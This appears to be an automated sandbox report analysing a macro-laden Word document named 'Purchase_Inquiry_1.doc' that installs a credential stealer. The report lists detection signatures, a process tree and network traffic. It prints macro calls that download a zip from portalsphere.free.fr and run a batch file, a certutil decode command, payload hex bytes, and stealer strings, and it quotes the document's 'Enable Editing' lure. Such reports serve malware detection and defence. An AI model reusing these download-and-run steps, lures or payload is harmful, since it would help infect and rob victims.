Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase_Inquiry_1.doc

Overview

General Information

Sample name:Purchase_Inquiry_1.doc
Analysis ID:1628942
MD5:a9bddd4272a1020b5b36be097f8a80f8
SHA1:5b7368f5a8b040dfdccfd6421f5d1e823aceb65a
SHA256:25dceeb01ea833d9dfd54c933f7c0f019079e86db670af3e2171c31e730dbe77
Tags:docuser-TeamDreier
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Document exploit detected (creates forbidden files)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document exploit detected (process start blacklist hit)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious ZIP file
Microsoft Office drops suspicious files
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Legitimate Application Dropped Archive
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Suspicious Microsoft Office Child Process
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
PE file overlay found
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 5560 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • certutil.exe (PID: 7668 cmdline: certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
    • cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c ""C:\3546255\Ppo.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • certutil.exe (PID: 7756 cmdline: certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: certutil.exe PID: 7756JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      14.2.certutil.exe.910a78.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        14.2.certutil.exe.910a78.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: File With Uncommon Extension Created By An Office Application
          Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 5560, TargetFilename: C:\5564642\Ppo.bat
          Sigma detected: Legitimate Application Dropped Archive
          Source: File createdAuthor: frack113, Florian Roth: Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 5560, TargetFilename: C:\5564642\1741130958.zip
          Sigma detected: Legitimate Application Dropped Executable
          Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\certutil.exe, ProcessId: 7668, TargetFilename: C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
          Sigma detected: Suspicious Microsoft Office Child Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" ", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" ", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 5560, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" ", ProcessId: 7412, ProcessName: cmd.exe
          Sigma detected: Suspicious Office Outbound Connections
          Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.6, DestinationIsIpv6: false, DestinationPort: 49719, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 5560, Protocol: tcp, SourceIp: 212.27.63.154, SourceIsIpv6: false, SourcePort: 80

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: Purchase_Inquiry_1.docAvira: detected
          Multi AV Scanner detection for submitted file
          Source: Purchase_Inquiry_1.docVirustotal: Detection: 53%Perma Link
          Source: Purchase_Inquiry_1.docReversingLabs: Detection: 47%
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

          Software Vulnerabilities

          barindex
          Document exploit detected (creates forbidden files)
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\5564642\Ppo.batJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\3546255\Ppo.batJump to behavior
          Document exploit detected (process start blacklist hit)
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: global trafficDNS query: name: portalsphere.free.fr
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global trafficTCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global trafficHTTP traffic detected: GET /phUploader/uploads/1741130958.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: portalsphere.free.frConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Mar 2025 08:50:19 GMTServer: Apache/ProXad [Jan 23 2019 20:05:46]Last-Modified: Mon, 03 Mar 2025 20:00:17 GMTETag: "2e4e0d125-1736c-67c60a51"Connection: closeAccept-Ranges: bytesContent-Length: 95084Content-Type: application/zipData Raw: 50 4b 03 04 14 00 00 00 08 00 67 5d 59 5a a7 bd e5 37 d8 72 01 00 74 fd 03 00 07 00 00 00 50 70 6f 2e 62 61 74 dc 7d 5b 73 ea ba 96 ee 7b 57 f5 7f 58 2f fb 29 55 27 4e 20 99 f0 70 ba 5a 92 e5 0b c6 10 19 0c 98 3a 2f c1 04 61 6e 4e 20 c1 90 5f 7f 34 86 2c 2e 21 99 2b 59 b3 ba cf a9 ce ae 3d b1 ad db 18 fa c6 55 92 bd fe f3 29 9d e6 7f e5 93 c9 bf ff db e6 e9 75 91 a7 8f 8b bf 9e 56 8f a3 c5 d3 d3 ee f5 69 b5 c9 f2 d5 a6 7c 30 7e 5a 3c ee d5 bf bb e7 47 7c 8e 2d fe ea f2 f0 81 92 0e bf af fe ef 7f c1 f5 bf fe 4f 76 53 7f 94 f5 fb d1 76 fe bf 5e 77 af c7 5a 7c c0 3f a9 f2 b4 7b fa f7 7f 43 22 ba bd 17 41 48 48 d4 1f 87 7f ae af 6b 84 34 25 31 7f 82 fc ec 4f b7 ac 4e de 64 95 bc 92 55 cb 1f 49 da 0d ad 69 cf 9d 3e a7 7b 5a a4 cb fa 2a 5d 3a af be db 9a 8e 96 77 db 31 a3 d9 b0 43 f7 e3 7e 55 3e aa ff 47 bc de f5 dd 9b ed d0 8d df 6c 61 05 8d 43 cf 54 44 8a 98 2e e1 36 21 9d f1 62 12 1f 07 6d 13 e2 4b de 54 85 84 b4 aa 4c fd eb 9b a2 c1 d6 62 07 b2 74 3f 47 32 65 79 a7 ff dc b3 3a c5 69 2b 9f 24 7e 8c 8f 4d 03 6e 26 8c 90 c3 b3 e3 df ac 4e 14 db e5 8d 4d 1c f5 bf af fe 18 b1 f5 60 f6 e6 5a 8d e3 91 7f fe e7 63 77 e7 7f 0c 1e 70 f9 e1 e1 9d 35 1c 4c 2d b8 1c b6 8e f3 53 91 fe e9 d4 9d d4 c7 d9 79 4b 57 ad 7d 02 a4 1e f8 01 b9 49 80 76 49 3e 0c 61 26 ab b9 6a 2c 46 6e 7d 56 56 2e f9 d5 64 de c9 cb b1 40 de c4 45 5f ba bf 6b 51 d6 d7 fc a8 3e 62 b2 09 24 25 f6 2e 26 42 a3 00 83 50 49 fe ec 8f 86 05 29 68 05 2e ff fa 8f bf fe 75 d4 b6 7f 95 5a a3 6b dd b6 90 eb ce 40 f4 60 78 26 81 82 40 12 a5 41 24 ba b2 d5 4c 51 2f 64 f8 0c 69 13 93 41 62 31 4d 60 55 d7 01 09 a4 b5 cc db 07 e3 89 ac ea 3a b4 9e ae 06 d5 36 f0 e9 4d eb d9 e1 ba 28 26 c3 e7 1b d3 26 f0 6e ef 0f 6d ec a8 be 3f d6 9b 4f c6 0d eb 05 b9 90 64 60 a6 95 0b bf 43 98 84 d9 77 9b c4 77 83 95 af a8 52 1a 59 c0 9c 3d df 43 7d f5 60 8a f5 d5 18 3c 4a 03 92 15 03 b2 ac 81 a0 07 6c 97 84 a4 48 3b 64 ea 93 80 80 f0 0c a3 a0 08 6d c7 e1 6e 20 cd ac 91 9b 93 f1 72 d4 30 99 db 0e 93 20 31 41 b3 13 aa b1 ab ee a8 00 a9 c9 ed a0 09 5a 9c bc 72 29 16 4d 91 2c 03 ba 81 7b 97 dc d6 26 40 67 20 93 97 86 f4 a1 3d c7 fb 45 95 59 a0 77 74 93 53 35 bf 4c 86 39 ca d9 4b 0c 3f a3 8b f2 a9 38 2f 97 a4 1b 2a 19 f1 50 42 14 df 94 4b 8b a4 84 78 a1 8f 3c ca 90 d1 4c f6 70 8e 84 1f 07 72 b8 65 8a 17 96 e5 7b 92 c9 11 d2 80 a0 27 2f 7a be ec 3e 41 d9 d4 fc 32 09 75 0b 46 b2 e7 77 86 f4 e5 7d db ce 36 7a 4e e5 c2 b9 91 e1 a8 00 15 ca 9b 74 57 4f 85 36 6f 6c 54 c0 7c e6 7e 3f 92 d7 19 d2 e6 fb 65 bd 16 8b ea 69 58 d4 5c ef 66 b7 b5 b1 ff c4 87 7e 82 db 6a c3 db fb ef 5c 0e f7 81 a2 31 75 6b 0f c0 43 43 ca 41 9f 14 eb 1e c8 81 ad 24 77 5a 6b 8c 0a 90 93 7c c9 e8 38 b1 d9 ab ad fa cc c2 a2 ea 7a cb 5a fb b4 4d 48 e6 93 d1 0c db 04 e7 6d 36 a9 6a b3
          Source: global trafficHTTP traffic detected: GET /phUploader/uploads/1741130958.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: portalsphere.free.frConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: portalsphere.free.fr
          Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, i19ag96bvk.exe.13.drString found in binary or memory: http://ip-api.com/json/?fie
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
          Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, i19ag96bvk.exe.13.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
          Source: Purchase_Inquiry_1.docString found in binary or memory: http://portalsphere.free.fr/phUploader/uploads/1741111253.zip
          Source: Purchase_Inquiry_1.docString found in binary or memory: http://portalsphere.free.fr/phUploader/uploads/1741130958.zip
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v10/users/
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/PyDevOG/Divulge-Stealer
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204g==================Divulge

          System Summary

          barindex
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
          Source: screenshotOCR: Enable Editing" from the yellow bar above Microsoft Word File Error loadingplease sender.. 113 chara
          Source: screenshotOCR: Enable Editing" from the yellow bar above 113 characters (an approximate value) p Type here to searc
          Source: screenshotOCR: Enable Editing" from the yellow bar above t.licrcscft p Type here to search ENG SG 03:50 04/03/2025
          Document contains an embedded VBA macro which may execute processes
          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function DownloadUnzipAndRun, API IWshShell3.Run("C:\3546255\\Ppo.bat")Name: DownloadUnzipAndRun
          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function DownloadUnzipAndRun, API IWshShell3.Run("C:\5564642\\Ppo.bat")Name: DownloadUnzipAndRun
          Document contains an embedded VBA macro with suspicious strings
          Source: Purchase_Inquiry_1.docOLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function DownloadUnzipAndRun, String wscript: Set objShell = CreateObject("WScript.Shell")Name: DownloadUnzipAndRun
          Document contains an embedded VBA with functions possibly related to ADO stream file operations
          Source: Purchase_Inquiry_1.docStream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function downloadFile, API IServerXMLHTTPRequest2.Open("GET","http://portalsphere.free.fr/phUploader/uploads/1741130958.zip",False)Name: downloadFile
          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function downloadFile, API Stream.Open()Name: downloadFile
